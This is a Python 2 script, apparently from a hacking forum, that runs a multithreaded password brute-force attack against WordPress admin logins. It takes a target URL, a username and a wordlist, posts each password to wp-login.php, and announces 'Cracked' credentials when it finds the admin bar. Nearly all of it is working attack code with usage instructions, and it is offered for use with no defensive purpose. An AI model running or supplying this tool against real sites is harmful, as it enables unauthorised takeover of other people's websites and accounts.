#!/usr/bin/python
# Video: http://youtu.be/mURnM-Yp72g
# Coded By: xSecurity
import urllib, urllib2, os, sys, requests as xsec, re
from time import sleep
from threading import Thread
def cls():
linux = 'clear'
windows = 'cls'
os.system([linux,windows][os.name == 'nt'])
cls()
print '''
__ _ _
__ __/ _\ ___ ___ _ _ _ __(_) |_ _ _
\ \/ /\ \ / _ \/ __| | | | '__| | __| | | |
> < _\ \ __/ (__| |_| | | | | |_| |_| |
/_/\_\\__/\___|\___|\__,_ |_| |_|\__|\__, |
|___/WordPress Brute Muliththreading :)
#Home: Sec4ever.CoM | Is-Sec.CoM | s3c-k.com
#Greets: UzunDz - b0x - Lov3rDNS - Mr.Dm4r - DamaneDz - rOx - r0kin
Special For My Lov3r Cyber-Crystal
#Usage: Python wp.py http://target.com/ admin pass.txt
#Note: U Need Install Requests Package: http://www.youtube.com/watch?v=Ng5T18HyA-Q'''
xsec = xsec.session()
def brute(target,usr,pwd):
get = xsec.get(target+'/wp-admin/')
post = {}
post["log"] = usr
post["pwd"] = pwd
post["wp-submit"] = "Log+in"
post["redirect_to"] = target
post["testcookie"] = "1"
get2 = xsec.post(target+'/wp-login.php' , data=urllib.urlencode(post))
get3 = xsec.get(target+'/wp-admin')
if '<li id="wp-admin-bar-logout">' in get3.text:
print '[+] Cracked Username: '+usr+' & Password: '+pwd
os._exit(1)
else:
print '[~] Trying ...: '+pwd
if len(sys.argv) >= 3:
target = sys.argv[1]
usr = sys.argv[2]
lst = open(sys.argv[3]).read().split("\n")
print '[*]Target: '+target
print '[*]LIST:',len(lst)
print '[*]Username: '+usr
thrdlst = []
for pwd in lst:
t = Thread(target=brute, args=(target,usr,pwd))
t.start()
thrdlst.append(t)
sleep(0.009)
for b in thrdlst:
b.join()
else:
print '[>]There Somthing Missing Check ARGVS :)'